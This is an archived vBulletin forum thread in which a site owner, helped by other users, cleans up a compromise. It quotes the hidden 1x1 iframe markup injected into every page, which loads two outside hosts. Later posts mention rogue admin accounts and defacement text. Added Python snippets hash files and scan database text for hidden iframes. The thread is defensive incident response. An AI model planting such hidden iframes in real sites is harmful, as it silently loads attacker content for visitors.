vb.org Archive


dawges 09-04-2013 08:35 PM

iframe injected into all templates
 
I have searched Google and have found a couple of forums suffering the same fate.

Today, all of a sudden, I noticed my pages loading slowly, so I looked at the code. I see an iframe at the bottom of all my pages:

Code:

<iframe src="http://damnxd.org/dns.html" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://www.jobless-jack.com/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

My question is, how did it get there and how do I get rid of it?

--------------- Added [DATE]1378334265[/DATE] at [TIME]1378334265[/TIME] ---------------

I am running version 4.2.0 by the way.

ozzy47 09-04-2013 08:47 PM

You may want to check your templates and see if you were hacked and someone added it into your templates.

dawges 09-04-2013 08:58 PM

Quote:

Originally Posted by ozzy47 (Post 2443275)
You may want to check your templates and see if you were hacked and someone added it into your templates.

I checked the footer template but I don't know what to look for. I don't see the code just jump out.

ozzy47 09-04-2013 09:00 PM

Ok, next step is to disable all plugins to see if it is coming from there.

Open your config.php and below <?php add this line:

PHP Code:

define('DISABLE_HOOKS', true);

So it looks like this:

PHP Code:

<?php
define('DISABLE_HOOKS', true);
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4.1.4

Then check the page again and see if the iframe is still there.

TheLastSuperman 09-04-2013 09:19 PM

If you have vBSEO installed this is very likely; it could also be from the recently discovered install directory exploit. We are unsure without actually investigating it ourselves.

Try running the queries listed on my blog post scroll down to find "Run the following Queries in phpMyAdmin" and do so - http://www.vbulletin.com/forum/blogs...vbulletin-site

Some basics:
  1. Start off by replacing all files with 100% fresh vBulletin files of the exact same version.
  2. Next run queries listed on the blog and investigate all that come up. If you're not running a custom style then first delete any malicious plugins/templates and you can delete the default style and remake a new one (create a new style after removing the malicious plugins etc. then delete the old one, otherwise your primary is the default and it will not allow you to delete etc.).
  3. Next check filesystem - AdminCP > Maintenance > Diagnostics > Suspect File Versions and check to see what is listed, cross reference that via FTP and inspect file dates etc. Anything named odd should be investigated, i.e. sexy.php, lol.php, anything seemingly odd; however, not all hackers are so apparent, they could have named it crontools.php or something you would, if not 100% familiar with the product, assume was a normal file, so take your time checking.
  4. Once you feel it's clean, either create or log in to your Google webmaster tools and request the site be checked; once they verify it's clean you're normally good to go.
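
An added example, not part of the thread and not vBulletin code: one way to do the file check in steps 1 and 3 without relying on file names is to hash the live tree against a fresh copy of the exact same version. The two small trees are constructed, and treating `includes/config.php` as the only site-specific file is an assumption.

```python
import hashlib
import tempfile
from pathlib import Path


def tree_hashes(root):
    """Map each file's path relative to root to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def audit(live_root, clean_root, site_files=("includes/config.php",)):
    """Compare a live tree with a pristine copy of the exact same version."""
    live, clean = tree_hashes(live_root), tree_hashes(clean_root)
    report = {"install_left": [], "unknown": [], "modified": []}
    for rel in sorted(live):
        if rel.startswith("install/"):
            report["install_left"].append(rel)  # whole directory should be gone
        elif rel in site_files:
            continue                            # expected to differ per site
        elif rel not in clean:
            report["unknown"].append(rel)       # flagged whatever it is named
        elif live[rel] != clean[rel]:
            report["modified"].append(rel)      # shipped file was changed
    return report


def write_tree(root, files):  # demo helper: relative path -> file text
    for rel, text in files.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(text)


def demo():
    """Audit two small constructed trees (not real vBulletin files)."""
    clean = {"index.php": "a", "includes/functions.php": "b",
             "install/upgrade.php": "c", "install/tools.php": "d"}
    live = dict(clean, **{"includes/config.php": "site", "includes/crontools.php": "x",
                          "includes/functions.php": "b + injected"})
    with tempfile.TemporaryDirectory() as clean_dir, tempfile.TemporaryDirectory() as live_dir:
        write_tree(clean_dir, clean)
        write_tree(live_dir, live)
        return audit(live_dir, clean_dir)


if __name__ == "__main__":
    print(demo())
```

Unknown files will also include legitimate uploads and add-on files, so each entry is something to inspect, not proof of compromise.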

ozzy47 09-04-2013 09:22 PM

Thanks Mike, I knew I'd seen that somewhere before, I just could not for the life of me remember where it was.

TheLastSuperman 09-04-2013 09:27 PM

Quote:

Originally Posted by ozzy47 (Post 2443283)
Thanks Mike, I knew I'd seen that somewhere before, I just could not for the life of me remember where it was.

lol tis now bookmarked, I've been visiting profile on vb.com then finding all blog posts lololol :p.

dawges 09-04-2013 09:27 PM

Disabling Hooks does nothing, the iframe stays.

Superman, I do not have vBSEO installed. However, I will read the post you provided and report back.

ozzy47 09-04-2013 09:29 PM

Hmmm then it may be in the files somewhere, if it is not in the templates or plugins. Let us know what you come up with after following the post.

dawges 09-04-2013 09:29 PM

I have 4 new administrators in my admin group. All hackers.

ozzy47 09-04-2013 09:31 PM

Ouch, you need to find out how they got in.

Zachery 09-04-2013 09:32 PM

Delete your install directory

TheLastSuperman 09-04-2013 09:34 PM

Quote:

Originally Posted by dawges (Post 2443286)
Disabling Hooks does nothing, the iframe stays.

Superman, I do not have vBSEO installed. However, I will read the post you provided and report back.

If you had it in the past let us know, if you have never installed and used it then simply read my blog and run the queries listed from within phpmyadmin. If you are not the best at dealing with this type of stuff or using phpmyadmin then please post the results here and we'll try to assist you the best we can.

*Also, who is your host? No name required, I simply ask as some do backups free of charge, some daily, some do hourly backups, and they may have one handy and can simply restore the site to just before the time of being hacked - if that is the case you will lose all posts/info since said time but you'll go back to the point before infection where you're safe to assume it's clean, then the objective at that time would be to rid yourself of any possible exploits such as removing the /install/ directory and checking for suspect file versions etc.

dawges 09-04-2013 09:36 PM

This username appeared 4 times in the admin group:

Th3H4ck

TheLastSuperman 09-04-2013 09:39 PM

Quote:

Originally Posted by dawges (Post 2443294)
This username appeared 4 times in the admin group:

Th3H4ck

Note the userids of those 4 accounts, you may need them for reference later, but as soon as you write them down delete those admin accounts and, as Zachery noted then me as well, delete the /install/ directory immediately if it's present.

*Stop for one second though and reply to my backup question above ^ Do you have a recent backup? If so it's better to restore and nip any possible exploits in the bud. If no backups then continue on investigating and clearing out any malicious code/files/other.

Edit: I'm taking the family out to dinner but will check this when I return as I have work to do tonight regardless ;).

dawges 09-04-2013 09:39 PM

Quote:

Originally Posted by Zachery (Post 2443291)
Delete your install directory

Deleted the install directory but the iframe still remains. Also, I have no idea how I was hacked.

--------------- Added [DATE]1378338074[/DATE] at [TIME]1378338074[/TIME] ---------------

Quote:

Originally Posted by TheLastSuperman (Post 2443297)
Note the userids of those 4 accounts, you may need them for reference later, but as soon as you write them down delete those admin accounts and, as Zachery noted then me as well, delete the /install/ directory immediately if it's present.

*Stop for one second though and reply to my backup question above ^ Do you have a recent backup? If so it's better to restore and nip any possible exploits in the bud. If no backups then continue on investigating and clearing out any malicious code/files/other.

Edit: I'm taking the family out to dinner but will check this when I return as I have work to do tonight regardless ;).

I do have backups provided by my host. However, they are probably too old. My forum is very busy. It really needs a daily backup.

snakes1100 09-04-2013 09:49 PM

You'll need to dig into the db, even though it's an iframe, he could have it hidden in a base64 code that's decoding into the iframe.

This could be hidden in numerous tables of your db, datastore, plugins, styles etc.
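
An added example, not part of the thread: a scanner for text pulled out of the database that flags invisible iframes whether they are stored plainly or wrapped in base64. The rows are constructed sample data, `example.invalid` is a placeholder, and the table and key names only mirror the ones mentioned in this thread.

```python
import base64
import binascii
import re

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Heuristics for "invisible" frames: hidden by CSS or sized 0/1 pixel.
HIDDEN_RE = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|(?:width|height)\s*=\s*[\"']?[01]\b",
    re.IGNORECASE)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")  # runs long enough to hold a tag


def decoded_runs(text):
    """Yield the decoded form of every base64-looking run in text."""
    for run in B64_RE.findall(text):
        run += "=" * (-len(run) % 4)  # tolerate stripped padding
        try:
            yield base64.b64decode(run, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid base64 after all


def scan_value(text):
    """Return (kind, tag) for each hidden iframe, plain or base64-wrapped."""
    bodies = [("plain", text)] + [("base64", d) for d in decoded_runs(text)]
    return [(kind, tag) for kind, body in bodies
            for tag in IFRAME_RE.findall(body) if HIDDEN_RE.search(tag)]


def scan_rows(rows):
    """rows: iterable of (table, key, text). Returns (table, key, kind) hits."""
    return [(table, key, kind) for table, key, text in rows
            for kind, _tag in scan_value(text)]


# Constructed sample data, not rows from the thread; example.invalid is a placeholder.
HIDDEN = ('<iframe src="http://example.invalid/x.html" width=1 height=1 '
          'style="visibility:hidden;position:absolute"></iframe>')
ENCODED = base64.b64encode(HIDDEN.encode()).decode()
ROWS = [
    ("template", "footer", "<div class='footer'>{vb:raw copyright}</div>"),
    ("template", "video", '<iframe src="https://example.invalid/e" width="560" height="315"></iframe>'),
    ("settings", "1", HIDDEN),
    ("datastore", "options", 'a:2:{s:7:"bbtitle";s:5:"Forum";s:4:"junk";s:%d:"%s";}' % (len(HIDDEN), HIDDEN)),
    ("plugin", "global_start", "eval(base64_decode('%s'));" % ENCODED),
]

if __name__ == "__main__":
    print(scan_rows(ROWS))
```

A visible, normally sized embed such as the constructed `video` row is not reported; only frames that are hidden or sized to 0 or 1 pixel are.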

dawges 09-04-2013 10:22 PM

Quote:

Originally Posted by snakes1100 (Post 2443301)
You'll need to dig into the db, even though it's an iframe, he could have it hidden in a base64 code that's decoding into the iframe.

This could be hidden in numerous tables of your db, datastore, plugins, styles etc.

I just installed the admincp firewall from here to block unknown IP addresses. I also have changed all my passwords. Now I am searching folder by folder for unknown php files. I will report if I find the source.

snakes1100 09-04-2013 10:24 PM

I wasn't suggesting files, I suggested in your db.

ozzy47 09-04-2013 10:25 PM

You make sure there are no unknown files in your vBulletin directory. You can use Maintenance --> Diagnostic --> Suspect File Versions to find these.

dawges 09-04-2013 10:53 PM

Quote:

Originally Posted by snakes1100 (Post 2443309)
I wasn't suggesting files, I suggested in your db.

I found a table called "settings" in my database that contained only one entry. The iframe. Should I delete the entire table?

ozzy47 09-04-2013 11:01 PM

I dunno if I would delete it, maybe rename it to x_settings to make sure it is not supposed to be used by a mod or something. Then check your site and see if the iframe is still in the footer.

dawges 09-04-2013 11:06 PM

Quote:

Originally Posted by ozzy47 (Post 2443320)
I dunno if I would delete it, maybe rename it to x_settings to make sure it is not supposed to be used by a mod or something. Then check your site and see if the iframe is still in the footer.

Oops, I didn't mean delete the table, just the entry. I did that but the iframe remains. There are no more database entries with this hack that I can see.

snakes1100 09-04-2013 11:06 PM

vb4 uses setting, not settings. If the only entry in that table is the iframe, I'd nuke it after backing it up.

But he has to be calling that table & setting, you may have more to inspect than just that.

dawges 09-04-2013 11:11 PM

Quote:

Originally Posted by snakes1100 (Post 2443323)
vb4 uses setting, not settings. If the only entry in that table is the iframe, I'd nuke it after backing it up.

But he has to be calling that table & setting, you may have more to inspect than just that.

Just found it again in the "datastore" table. However, it's full of other settings. Not sure how to remove it from there.

snakes1100 09-04-2013 11:12 PM

Try this https://vborg.vbsupport.ru/showthread.php?t=265866

Backup your db first.

Manually editing your datastore can be tricky.

dawges 09-04-2013 11:24 PM

Quote:

Originally Posted by snakes1100 (Post 2443327)
Try this https://vborg.vbsupport.ru/showthread.php?t=265866

Backup your db first.

Manually editing your datastore can be tricky.

I saw this addon many times but ignored it lol. What a dummy. I just installed it and ran it through scheduled tasks and it removed the iframe.

Thanks!

I still have no idea how I was hacked but apparently they couldn't do much. They didn't even edit my config file.

I changed all passwords
Installed admin panel firewall
and ran the hack fix

that seems to have done the trick.

snakes1100 09-04-2013 11:26 PM

Welcome

ozzy47 09-04-2013 11:28 PM

Glad to hear it is gone for now, hopefully it won't come back. Maybe they got one of the admin passwords or something, or it could have come from one of your mods, make sure they are all up to date.

--------------- Added [DATE]1378344772[/DATE] at [TIME]1378344772[/TIME] ---------------

I would also recommend installing this mod, https://vborg.vbsupport.ru/showthrea...ght=vbsecurity

dawges 09-04-2013 11:40 PM

Quote:

Originally Posted by ozzy47 (Post 2443336)
Glad to hear it is gone for now, hopefully it won't come back. Maybe they got one of the admin passwords or something, or it could have come from one of your mods, make sure they are all up to date.

--------------- Added [DATE]1378344772[/DATE] at [TIME]1378344772[/TIME] ---------------

I would also recommend installing this mod, https://vborg.vbsupport.ru/showthrea...ght=vbsecurity

This is very troubling. I just don't see how they got in. However, if you do a search on those hackers' nicknames on Google you will see other admins suffering the same fate today. I hope they find this thread.

--------------- Added [DATE]1378345346[/DATE] at [TIME]1378345346[/TIME] ---------------

snakes1100 09-04-2013 11:47 PM

Did you have your install directory still on the site? If you haven't removed it already, remove it now.

--------------- Added [DATE]1378345705[/DATE] at [TIME]1378345705[/TIME] ---------------

It's best to htaccess protect your admincp & modcp after renaming them, not using a hack to do it.

dawges 09-04-2013 11:49 PM

Quote:

Originally Posted by snakes1100 (Post 2443343)
Did you have your install directory still on the site? If you haven't removed it already, remove it now.

I sure did. I only deleted install.php when I installed it, I deleted the whole directory today when someone mentioned it in this thread. Could that have been the problem?

TheLastSuperman 09-05-2013 12:13 AM

Quote:

Originally Posted by dawges (Post 2443345)
I sure did. I only deleted install.php when I installed it, I deleted the whole directory today when someone mentioned it in this thread. Could that have been the problem?

Yes it could have been, to be 100% safe delete the entire directory. Some I've heard have only been deleting install.php and upgrade.php but no official statement yet as to what causes the exploit only a vague announcement and very late email regarding such.

So long as you delete the entire directory as you noted, you won't be subject to the exploit within.

Please note: If at anytime in the future an issue arises such as your admin account messing up or issues with cookies and you need to use tools.php to reset any of it, you will need to re-upload the /install/ directory (do not re-upload install.php or upgrade.php) then run tools.php to sort the issue then promptly delete the entire directory once again. <-- This is only required in the event you need to run tools.php as it requires the install directory to be present.

induslady 09-07-2013 04:44 PM

Hello,

I came to know of this exploit and it looks like we too had this attack. We did the below:

1. Deleted install folder
2. Deleted suspicious admin user accounts
4. Refer thread - https://vborg.vbsupport.ru/showthread.php?t=301892 as mentioned there. I didn't have any iframe injection, but there was a line added in the "header" template of one of our custom styles that reads as "Kindly delete "install" directory of your forums. Otherwise you will keep getting hacked" and the suspicious lines were removed.

Also we notice that a few templates in the custom style have edit history that says "Edited by .." the suspicious admin accounts with time stamp in the past year 2010.

Are there any other precautions that need to be done? Am I currently still exploited? What are the other security measures that I need to do to protect my forums?

ArchAngelz 09-18-2013 01:22 PM

Hi everyone,

I am encountering a similar problem with forums/forum.php. It seems only forum.php is affected.

This is what is displayed
"DzPhoeniX Here :P | PS :: Don't Mind Just kidding ;) "

Other pages are fine.

If I log in as administrator, forum.php loads correctly.

After some investigations in the admin logs, I found admin users created and logs show this:

https://vborg.vbsupport.ru/external/2013/09/13.jpg
https://vborg.vbsupport.ru/external/2013/09/14.jpg

I have already disabled those accounts but would like to know how to resolve the issue other than a database restore. It seems there could be a plugin or a template edit.

A search for "DzPhoenix" in templates led me to FORUMHOME which was blank except for the line above. I thus restored FORUMHOME back to its original state and everything seems fine again.

Is there anything else I should check on? I'm a bit worried about the references to plugins above and would appreciate any help on this.


All times are GMT.
